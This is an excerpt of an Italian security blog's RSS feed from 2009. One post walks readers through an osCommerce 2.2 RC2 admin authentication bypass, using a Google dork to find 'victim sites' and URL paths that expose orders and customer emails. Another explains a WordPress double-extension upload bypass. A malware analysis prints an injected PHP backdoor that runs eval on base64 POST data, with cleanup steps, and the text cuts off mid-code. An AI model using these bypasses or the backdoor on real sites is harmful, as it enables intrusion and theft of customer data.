		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[osCommerce 2.2 RC2]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=342</guid>
		<description><![CDATA[Lo scorso 13 Novembre Stuart Udall ha segnalato una nuova vulnerabilità per il noto ma allo stesso tempo abbandonato osCommerce RC 2.2 che consente di accedere ad alcune sezioni dell&#8217;Area Amministrativa senza aver bisogno di alcuna login e password. Come potrete verificare personalmente tramite questo Proof Of Concept basterà richiamare l&#8217;url dell&#8217;Area Admin con una [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/oscommerce.gif" rel="lightbox[342]" title="osCommerce"><img class="alignleft size-thumbnail wp-image-343" title="osCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/oscommerce-150x60.gif" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="60" /></a>Lo scorso 13 Novembre Stuart Udall ha segnalato una nuova <strong>vulnerabilità</strong> per il noto ma allo stesso tempo abbandonato <strong>osCommerce RC 2.2</strong> che consente di accedere ad alcune sezioni dell&#8217;Area Amministrativa senza aver bisogno di alcuna login e password.</p>
<p>Come potrete verificare personalmente tramite questo <strong>Proof Of Concept</strong> basterà richiamare l&#8217;url dell&#8217;Area Admin con una particolare sintassi e il gioco è fatto e <strong>si potranno visionare gli ordini, i clienti, le email</strong>.</p>
<p>Già verso agosto fu scoperta una grave falla nel meccanismo di autenticazione che consentiva, tramite opportune interrogazioni HTTP (http request) di <strong>eseguire comandi lato server</strong> e, sfruttando alcuni file dell&#8217;osCommerce stesso,  di uploadare file, shell etc.</p>
<p>Per maggiori informazioni circa questa vulnerabilità andate a questo <a href="http://secunia.com/advisories/33446/" target="_blank"><strong>link</strong></a>.</p>
<p>Per quanto riguarda la falla di cui vi parlo oggi vi illustro di seguito come sfruttarla e quali informazioni si possono ottenere. Per prima cosa è necessario trovare un &#8220;<strong>sito vittima</strong>&#8220;  e per fare questo ci viene incontro, ancora una volta, <a href="http://www.google.com/" target="_blank"><strong>Google</strong></a>!</p>
<p><span id="more-342"></span>Cercate su Google la seguente stringa:</p>
<p><cite>&#8220;Powered by OsCommerce&#8221;</cite></p>
<p>(compresa di virgolette)</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/google_search.PNG" rel="lightbox[342]" title="Dork OsCommerce"><img class="size-thumbnail wp-image-344 aligncenter" title="Dork OsCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/google_search-150x68.PNG" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="68" /></a></p>
<p>In questo modo il Motore di Ricerca ci mostrerà solo i siti che contengono esattamente quella frase e, quindi, con molta probabilità siti basati su <strong>OsCommerce</strong>.</p>
<p>A questo punto aprite qualche sito e verificate se richiamando l&#8217;area &#8220;admin&#8221; vi viene mostrata correttamente la pagina di login.</p>
<p>L&#8217;area admin di default è raggiungibile al seguente url:</p>
<p><cite>http://&lt;dominio_con_oscommerce&gt;/admin</cite></p>
<p>Se l&#8217;Admin non ha cambiato il nome della cartella vi apparirà una schermata simile a questa.</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/adminoscommerce.PNG" rel="lightbox[342]" title="Admin Login OsCommerce"><img class="size-thumbnail wp-image-345 aligncenter" title="Admin Login OsCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/adminoscommerce-150x150.PNG" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="150" /></a></p>
<p>A questo punto si sfrutterà la vulnerabilità nell&#8217;autenticazione per <strong>bypassarla</strong> semplicemente digitando i seguenti url:</p>
<p>/admin/orders.php/login.php<br />
 /admin/mail.php/login.php<br />
 /admin/mail.php/login.php?fooled<br />
 /admin/mail.php/login.php?action=send_email_to_user</p>
<p>Cosa succede richiamando questi url? (a voi scoprirlo!)</p>
<p>Si accederà in visualizzazione alle funzionalità di quei file e quindi, nell&#8217;esempio citato sopra, <strong>si potranno leggere gli ordini e vedere i clienti con le relative email</strong>.</p>
<p>Questo articolo è solamente un Proof Of Concept e pertanto non deve portare ad alcuna azione malevola.</p>
<p>Per chi utilizza <strong>OsCommerce</strong> consiglio o di valutare il passaggio a tutt&#8217;altro applicativo, visto anche che il progetto è ormai fermo, oppure di andare sul Forum di OsCommerce dove suggeriscono una semplice ma efficace (?) fix al problema.</p>
<p>Link correlati:</p>
<p><strong><a href="http://seclists.org/fulldisclosure/2009/Nov/169" target="_blank">OS Commerce authentication bypass by Stuart Udall</a></strong></p>
<p><a href="http://forums.oscommerce.com/topic/348589-serious-hole-found-in-oscommerce" target="_blank"><strong>Post dal Forum di OsCommerce</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; WordPress </title>
		<link>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html</link>
		<comments>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html#comments</comments>
		<pubDate>Sat, 14 Nov 2009 16:24:46 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[remote file upload]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=337</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/broken-wordpress-lock.png" rel="lightbox[337]" title="WordPress File Arbitrary Upload"><img class="alignleft size-thumbnail wp-image-338" title="WordPress File Arbitrary Upload" src="http://www.capn3m0.org/wp-content/uploads/2009/11/broken-wordpress-lock-150x150.png" alt="[EXPLOIT]   Wordpress <= 2.8.5 Arbitrary File Upload" width="150" height="150" /></a>Ieri avevo dato <a href="http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html" target="_self">notizia</a> del rilascio della versione<strong> 2.8.6 di WordPress</strong> che risolveva due falle di <strong>sicurezza</strong>.</p>
<p>La notizia non era molto dettagliata poiché la <strong>vulnerabilità</strong> era stata annunciata molto genericamente come una vulnerabilità che permetteva di &#8220;<strong>aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache&#8221;.</strong> Ora che è stata patchata, come spesso accade, iniziano a trovarsi maggiori informazioni e <strong>Proof of Concept</strong>.</p>
<p>In realtà la vulnerabilità <strong>permette di uploadare file bypassando il controllo</strong> della tipologia di file e permettendo, quindi, di uploadare script php e similari che possono poi essere richiamati da colui che attacca. <strong>Affligge tutte le versioni inferiori alla 2.8.5</strong> (compresa) perciò provvedete quanto prima ad aggiornare il vostro blog.</p>
<p><span id="more-337"></span>
<p>La notizia era stata pubblicata l&#8217;11 Novembre scorso nella nota Mailing List <a href="http://seclists.org/fulldisclosure" target="_blank"><strong>Full Disclosure</strong></a> dove Dawid Golunski ha pubblicato un Proof Of Concept che potete leggere a questo <a href="http://seclists.org/fulldisclosure/2009/Nov/141" target="_blank">link</a>. Praticamente spiega che la verifica del file uploadato avviene confrontando l&#8217;estensione del file, estrapolata tramite una Regular Expression, con un array dei Mime Type permessi.</p>
<p>La Regular Expression, però, unita al fatto che i WebServer <a href="http://apache.org/" target="_blank"><strong>Apache</strong></a> (solamente in una particolare configurazione spiegata <a href="http://seclists.org/fulldisclosure/2009/Nov/152" target="_blank"><strong>qui</strong></a>) consentono di creare file nel formato</p>
<p>
<blockquote>filename.ext1.ext2</p></blockquote>
<p>può essere bypassata uploadando un file contenente codice Php e assegnandogli un nome come il seguente:</p>
<blockquote><p>phpinfo.php.jpg</p>
</blockquote>
<p>In questo modo la verifica del file applicata da WordPress estrapolerebbe tramite la RegEx l&#8217;estensione &#8220;.jpg&#8221; e successivamente, verificandola con l&#8217;Array dei Mime Types ammessi, <strong>permetterebbe al file di essere uploadato scambiandolo per un&#8217;immagine</strong>.</p>
<p>Una volta fatto ciò chi attacca potrà richiamare lo script digitando la path standard dei file uploadati di WordPress ossia:</p>
<blockquote><p>http:///wp-content/uploads/2009//phpinfo.php.jpg</p>
</blockquote>
<p>Questa vulnerabilità, sebbene grave, non dovrebbe causare gravi danni visto <strong>che chi attaca deve essere un membro dello staff con privilegi di pubblicazione</strong> come era stato annunciato in occasione della 2.8.6.</p>
<p>Resta invece ancora sconosciuta la vulnerabilità di Cross Site Scripting scoperta da Benjamin Flesch sempre nella versione 2.8.5 di WordPress.</p>
<p>Eccovi alcuni link correlati:</p>
<p><a href="http://seclists.org/fulldisclosure/2009/Nov/141" target="_blank">Proof Of Concepts &#8211; WordPress &lt;= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution by Dawid Golunski</a></p>
<p><a href="http://www.vupen.com/english/advisories/2009/3234" target="_blank">Vupen &#8211; WordPress Arbitrary File Upload and Cross Site Scripting Vulnerabilities</a></p>
<p><a href="http://www.securityfocus.com/bid/37014/info" target="_blank">SecurityFocus &#8211; <span>WordPress Unspecified Cross Site Scripting Vulnerability</span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!</title>
		<link>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html</link>
		<comments>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html#comments</comments>
		<pubDate>Fri, 13 Nov 2009 08:54:53 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[security release]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=331</guid>
		<description><![CDATA[Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli attacchi hacker avvenissero grazie a falle presenti in WordPress 2.8.5, rilasciato neanche un mese fa, è stata appena annunciata la security release 2.8.6 che contiene due importati fix di sicurezza. La prima è una vulnerabilità del componente &#8220;Press This&#8221; (Pubblicalo in italiano) scoperta [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/img_wp.JPG" rel="lightbox[331]" title="Wordpress 2.8.6"><img class="alignleft size-thumbnail wp-image-333" title="Wordpress 2.8.6" src="http://www.capn3m0.org/wp-content/uploads/2009/11/img_wp-150x150.jpg" alt="Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!" width="150" height="150" /></a>Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html" target="_self"><strong>attacchi hacker</strong></a> avvenissero grazie a falle presenti in <strong>WordPress 2.8.5</strong>, rilasciato neanche un mese fa, è stata appena annunciata la <a href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/" target="_blank"><strong>security release 2.8.6</strong></a> che contiene due importati fix di sicurezza.</p>
<p>La prima è una vulnerabilità del componente &#8220;Press This&#8221; (Pubblicalo in italiano) scoperta da Benjamin Flesch che permetteva di eseguire <a href="http://it.wikipedia.org/wiki/Cross-site_scripting" target="_blank"><strong>XSS (Cross Site Scripting)</strong></a> agli utenti registrati con privilegi di pubblicazione.</p>
<p>La seconda, invece, è stata scoperta da Dawid Golunski e consentiva di<strong> aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache.</strong></p>
<p>In attesa della versione <strong>WordPress 2.9</strong> consiglio a tutti di provvedere ad aggiornare la propria versione tramite la funzione di &#8220;Aggiornamento Automatico&#8221; che verrà suggerita non appena entrerete nella vostra Bacheca.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[HACK] &#8211; Cannot redeclare security_update(), alla fine è arrivato!</title>
		<link>http://www.capn3m0.org/hack-cannot-redeclare-security_update.html</link>
		<comments>http://www.capn3m0.org/hack-cannot-redeclare-security_update.html#comments</comments>
		<pubDate>Sat, 07 Nov 2009 23:21:27 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[HTML/Crypted.gen]]></category>
		<category><![CDATA[infezione]]></category>
		<category><![CDATA[ob_start(”security_update”)]]></category>
		<category><![CDATA[security_update]]></category>
		<category><![CDATA[sito malevolo]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=325</guid>
		<description><![CDATA[PREMESSA Il 9 febbraio scorso nel post titolato &#8220;18446744073709551615 – Un nuovo hack in arrivo?&#8221; avevo descritto un hacking che stava avvenendo in centinaia di siti di hosting italiani e stranieri che non aveva un apparente denominatore comune. Infatti all&#8217;epoca non si spiegava se venivano sfruttate vulnerabilità dell&#8217;applicativo in uso sul proprio dominio (in Rete [...]]]></description>
			<content:encoded><![CDATA[<h2><img class="size-thumbnail wp-image-327 alignleft" title="Hacking" src="http://www.capn3m0.org/wp-content/uploads/2009/11/bio-150x150.jpg" alt="[HACK]   Cannot redeclare security update(), alla fine è arrivato!" width="150" height="150" />PREMESSA</h2>
<p>Il 9 febbraio scorso nel post titolato &#8220;<a href="http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html" target="_self"><strong>18446744073709551615 – Un nuovo hack in arrivo?</strong></a>&#8221; avevo descritto un <strong>hacking </strong>che stava avvenendo in centinaia di siti di hosting italiani e stranieri che non aveva un apparente denominatore comune.</p>
<p>Infatti all&#8217;epoca non si spiegava se venivano sfruttate <strong>vulnerabilità dell&#8217;applicativo</strong> in uso sul proprio dominio (in <a href="http://www.juliusdesign.net/wordpress-2-8-5-attacco-haked-su-aruba/" target="_blank"><strong>Rete</strong></a> in questi ultimi giorni c&#8217;è un gran parlare sulla possibilità che sia <strong>WordPress</strong> la causa) o se si trattasse di uno <strong>stealing di account</strong> ma alla luce di quanto analizzato a febbraio e quanto analizzato in questi giorni vi sono in rete diverse &#8220;testimonianze&#8221; di siti hackerati che con molta probabilità non hanno vulnerabilità in quanto basati su semplici <strong>pagine html statiche</strong>.</p>
<p>Alcune &#8220;vittime&#8221; mi han contattato privatamente e mi hanno fornito informazioni per poter delineare meglio questo hack.</p>
<p>Ricordo a chi legge questo Blog per la prima volta che nel <a href="http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html" target="_self">post precedente </a>chiamato volutamente &#8220;Un nuovo hack in arrivo?&#8221; segnalavo come le azioni di febbraio apparivano più come un &#8220;giro di test&#8221; che come un&#8217;azione a fini malevoli quale è, invece, in questi giorni. A febbraio numerosi siti subirono un <strong>hack atipico </strong>poiché i siti vittima non venivano alterati o infettati da virus/trojan ma, semplicemente, mostravano il numero &#8220;<strong>18446744073709551615</strong>&#8221; a pié di pagina e nel codice si poteva individuare la dichiarazione di una funzione dal nome &#8220;<strong>ob_start(&#8220;security_update&#8221;)</strong>&#8220;. Questo, dal mio punto di vista, poteva essere interpretato come un marcatore tramite il quale chi attacca può farsi un&#8217;idea di quanti potenziali vittime potrebbe colpire.</p>
<p><span id="more-325"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/hack-cannot-redeclare-security_update.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[SECURITY] &#8211; 5 utili plugins per Firefox</title>
		<link>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html</link>
		<comments>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html#comments</comments>
		<pubDate>Tue, 17 Feb 2009 20:35:45 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[cookie manipulation]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hackbar]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[header http]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[remote file inclusion]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sql inject me]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[tamper data]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[web developer]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[xss me]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=248</guid>
		<description><![CDATA[In questo articolo vi presenterò 5 utili Addons di Firefox che possono tornare utili in diverse situazioni e, in particolar modo, quando si vogliono testare vulnerabilità e similari di un applicativo web. I plugins di cui parlerò sono i seguenti: Web Developer Bar Xss Me Sql Inject Me HackBar Tamper Data Questi 5 plugin torneranno [...]]]></description>
			<content:encoded><![CDATA[<p>In questo articolo vi presenterò <a href="https://addons.mozilla.org/it/firefox/" target="_blank"><strong>5 utili Addons di Firefox </strong></a>che possono tornare utili in diverse situazioni e, in particolar modo, quando si vogliono testare vulnerabilità e similari di un applicativo web.</p>
<p>I plugins di cui parlerò sono i seguenti:</p>
<ul>
<li><strong>Web Developer Bar</strong></li>
<li><strong>Xss Me</strong></li>
<li><strong>Sql Inject Me</strong></li>
<li><strong>HackBar</strong></li>
<li><strong>Tamper Data</strong></li>
</ul>
<p>Questi 5 plugin torneranno molto utili quando proveremo ad effettuare le nostre prime analisi di sicurezza in quanto permettono di analizzare diversi aspetti di un sito web. Va detto che non sono programmi  &#8220;per bucare&#8221; ma semplicemente dei test i cui risultati, se si hanno le giuste conoscenze, possono aiutare ad individuare falle o vulnerabilità in un dato sito.</p>
<p><span id="more-248"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>18446744073709551615 &#8211; Un nuovo hack in arrivo?</title>
		<link>http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html</link>
		<comments>http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html#comments</comments>
		<pubDate>Mon, 09 Feb 2009 19:15:20 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=122</guid>
		<description><![CDATA[Negli ultimi giorni sto riscontrando un aumento di casi di hacking in cui apparentemente l&#8217;azione malevola consiste nel far visualizzare alla fine della home page della vittima il numero &#8220;18446744073709551615&#8220;. Ricercando in rete utilizzando questo numero come chiave di ricerca si troveranno numerosi articoli/post che affermano che si tratta del massimo numero utilizzabile all&#8217;interno di [...]]]></description>
			<content:encoded><![CDATA[<p>Negli ultimi giorni sto riscontrando un aumento di casi di hacking in cui apparentemente l&#8217;azione malevola consiste nel far visualizzare alla fine della home page della vittima il numero &#8220;<strong>18446744073709551615</strong>&#8220;.</p>
<p>Ricercando in rete utilizzando questo numero come chiave di ricerca si troveranno numerosi articoli/post che affermano che si tratta del massimo numero utilizzabile all&#8217;interno di un campo <strong>BIGINT </strong>in Php. Questo porterà l&#8217;ignaro utente ad impazzire alla ricerca della funzione all&#8217;interno del proprio sito che esegue calcoli che portano alla comparsa di questo numero. Tutto ciò sarà inutile!</p>
<p>In realtà questo numero viene visualizzato poiché le pagine &#8220;<strong>index.php</strong>&#8221; del proprio sito sono state hackerate inserendo al loro interno la seguente funzione che<strong> non altera il comportamento della pagina ma visualizza a pié di pagina il numero in oggetto</strong>.</p>
<p><span id="more-122"></span></p>
<p>La pagina modificata apparirà con il seguente codice:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
<span style="color: #990000;">ob_start</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;security_update&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//do not remove this line - important security update!</span>
&nbsp;
<span style="color: #339933;">&lt;---</span> CODICE ORIGINALE DELLA PAGINA <span style="color: #339933;">---&gt;</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">?&gt;</span>
                <span style="color: #339933;">&lt;</span> ?php
                <span style="color: #000000; font-weight: bold;">function</span> security_update<span style="color: #009900;">&#40;</span><span style="color: #000088;">$buffer</span><span style="color: #009900;">&#41;</span>
                <span style="color: #009900;">&#123;</span>
                        <span style="color: #000088;">$update</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">'18446744073709551615'</span><span style="color: #339933;">;</span>
                        <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">stristr</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$buffer</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'&lt;/html'</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!==</span> <span style="color: #009900; font-weight: bold;">FALSE</span><span style="color: #009900;">&#41;</span>
                        <span style="color: #009900;">&#123;</span>
                                <span style="color: #b1b100;">return</span> <span style="color: #990000;">eregi_replace</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'&lt;/html'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$update</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'&lt;html'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$buffer</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                        <span style="color: #009900;">&#125;</span>
                        <span style="color: #b1b100;">else</span>
                        <span style="color: #009900;">&#123;</span>
                                <span style="color: #b1b100;">return</span> <span style="color: #000088;">$buffer</span><span style="color: #339933;">.</span><span style="color: #000088;">$update</span><span style="color: #339933;">;</span>
                        <span style="color: #009900;">&#125;</span>
                <span style="color: #009900;">&#125;</span>
                <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>Come potete vedere analizzando il codice la funzione &#8220;<strong>security_update</strong>&#8221; non fa altro che inserire tutto l&#8217;output originale della propria pagina in un buffer e successivamente accodare al buffer il valore &#8220;<strong>18446744073709551615</strong>&#8220;.</p>
<p>La domanda che sorge è: <strong>perché?</strong></p>
<p>Sebbene stia tenendo d&#8217;occhio l&#8217;evolversi di questo hack non si è ancora individuato il motivo di tale azione. L&#8217;ipotesi che al momento appare essere la più veritiera è che venga utilizzato questo codice come &#8220;<strong>marcatore</strong>&#8221; dei siti &#8220;infetti&#8221; così da poterli facilmente trovare in una eventuale <a href="http://www.google.it/search?hl=it&amp;q=inurl%3Aindex.php+%2B18446744073709551615+&amp;sourceid=navclient-ff&amp;rlz=1B3GGGL_itIT312IT312&amp;ie=UTF-8&amp;aq=t&amp;oq=inurl%3Aindex.php+%2B18446744073709551615+" target="_blank"><strong>ricerca in rete</strong></a>.</p>
<p>In questo modo chi sta effettuando tali hack potrà individuare le proprie vittime e i siti per i quali conosce la falla di sicurezza che ha consentito di scrivere, per ora, il numero &#8220;<strong>18446744073709551615</strong>&#8220;.</p>
<p>Vedendo l&#8217;andamento delle ultime settimane ho assistito ad un&#8217;<strong>evoluzione dello script</strong> in quanto è stata aggiunta una nuova riga che potrebbe essere realmente dannosa per le vittime. Questo il codice nella sua nuova versione:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
<span style="color: #990000;">ob_start</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;security_update&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//do not remove this line - important security update!</span>
 <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">md5</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'73043475c0893e30'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">==</span><span style="color: #0000ff;">&quot;59fdd20854f4a2056c082cab53e64860&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #990000;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">base64_decode</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #990000;">exit</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span><span style="color: #339933;">&lt;</span> ?php</pre></td></tr></table></div>

<p>Questo script ha in più <strong>un check su un cookie</strong> che, se verificato (<strong>$_COOKIE['73043475c0893e30'])==&#8221;59fdd20854f4a2056c082cab53e64860&#8243;</strong>), esegue una decodifica di un file criptato inviato via <strong>POST</strong>.</p>
<p>In questo modo l&#8217;hacker ha la possibilità di inviare file a tutti i domini che precedentemente aveva infettato e &#8220;marcato&#8221;.</p>
<p>Per ora non ho assistito ad azioni concrete che hanno sfruttato questa funzione &#8220;<strong>security_update()</strong>&#8221; ma, ovviamente, è naturale pensare che lo script e le sue evoluzioni siano vari step di un&#8217;azione mirata a raccogliere centinaia di siti infetti per effettuare in seguito un attacco di massa.</p>
<h1><strong>Come eliminarlo?</strong></h1>
<p>Per eliminarlo basta individuare tutte le pagine che mostrano il numero &#8220;<strong>18446744073709551615</strong>&#8221; e ripulirle dal codice di questo hack mostrato in precedenza.</p>
<p>Anche in questo caso il programma &#8220;<a href="http://www.powergrep.com/" target="_blank"><strong>PoweGrep</strong></a>&#8221; ci torna comodo permettendoci di effettuare una ricerca della stringa &#8220;<strong>18446744073709551615</strong>&#8221; su tutti i file del proprio sito (in locale).</p>
<p>Una volta individuate la pagine vanno rimosse queste righe dalla parte superiore della pagina:</p>
</pre>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
<span style="color: #990000;">ob_start</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;security_update&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//do not remove this line - important security update!</span>
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">md5</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'73043475c0893e30'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">==</span><span style="color: #0000ff;">&quot;59fdd20854f4a2056c082cab53e64860&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #990000;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">base64_decode</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #990000;">exit</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>(la riga 3 non è presente in tutte le versioni)</p>
<p>e queste rige dalla fine:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="code"><pre class="php" style="font-family:monospace;">                <span style="color: #339933;">&lt;</span> ?php
                <span style="color: #000000; font-weight: bold;">function</span> security_update<span style="color: #009900;">&#40;</span><span style="color: #000088;">$buffer</span><span style="color: #009900;">&#41;</span>
                <span style="color: #009900;">&#123;</span>
                        <span style="color: #000088;">$update</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">'18446744073709551615'</span><span style="color: #339933;">;</span>
